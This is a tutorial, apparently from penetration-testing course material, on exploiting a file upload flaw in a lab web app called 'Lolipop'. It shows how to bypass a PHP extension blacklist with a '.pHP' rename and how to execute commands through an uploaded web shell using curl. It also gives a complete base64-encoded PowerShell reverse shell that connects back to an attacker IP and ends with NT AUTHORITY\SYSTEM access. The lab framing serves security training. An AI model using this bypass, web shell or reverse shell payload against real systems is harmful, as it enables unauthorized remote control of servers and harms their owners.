Published on March 20, 2025
In this section, we will explore a file upload vulnerability that allows us to upload and execute files on the web server. Similar to Directory Traversal and File Inclusion vulnerabilities, understanding how to identify File Upload vulnerabilities is crucial.
Depending on the web application, we can often make educated guesses about where file upload mechanisms might exist. In CMS-based applications, users may be able to upload profile avatars or attach files to blog posts. Company websites often provide upload functionality in career sections or client portals. Enumeration is key to discovering these upload points.
We will now demonstrate how to abuse an upload mechanism to execute arbitrary code and gain a reverse shell. Our target is the "Lolipop" application on the Lolipop VM.
kali@kali:~$ echo "this is a test" > test.txtAfter successfully uploading test.txt, we confirm that the application does not restrict file types to images.
Next, we attempt to upload simple-backdoor.php, but the application blocks PHP file uploads.
A common way to bypass blacklists is by modifying the file extension. For example, changing .php to .php7 or using uppercase characters in the extension (.pHP) can often bypass simple security measures.
mv simple-backdoor.php simple-backdoor.pHPBy renaming the file and uploading simple-backdoor.pHP, we successfully bypass the restriction.
Once uploaded, we use curl to execute commands through our web shell.
kali@kali:~$ curl http://192.168.50.189/meteor/uploads/simple-backdoor.pHP?cmd=dirThe command output confirms that our shell is active and executing commands on the server.
We can now leverage this access to establish a reverse shell.
kali@kali:~$ nc -nvlp 4444To execute commands remotely, we create and encode a PowerShell reverse shell script.
kali@kali:~$ pwsh
PowerShell 7.1.3
Copyright (c) Microsoft Corporation.
https://aka.ms/powershell
Type 'help' to get help.
PS> $Text = '$client = New-Object System.Net.Sockets.TCPClient("192.168.119.3",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
PS> $Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text)
PS> $EncodedText =[Convert]::ToBase64String($Bytes)
PS> $EncodedText
JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0
...
AYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA
PS> exitkali@kali:~$ curl http://192.168.50.189/meteor/uploads/simple-backdoor.pHP?cmd=powershell%20-enc%20JABjAGwAaQ...kali@kali:~$ nc -nvlp 4444
listening on [any] 4444 ...
connect to [192.168.119.3] from (UNKNOWN) [192.168.50.189] 50603
PS C:\xampp\htdocs\meteor\uploads> whoami
nt authority\system
The output confirms that we have successfully gained remote control of the system as NT AUTHORITY\SYSTEM.
In this guide, we demonstrated how to exploit a file upload vulnerability to achieve remote code execution. We bypassed security filters, confirmed command execution, and leveraged a PowerShell payload to obtain a reverse shell. This technique is applicable to various web applications with weak file upload restrictions.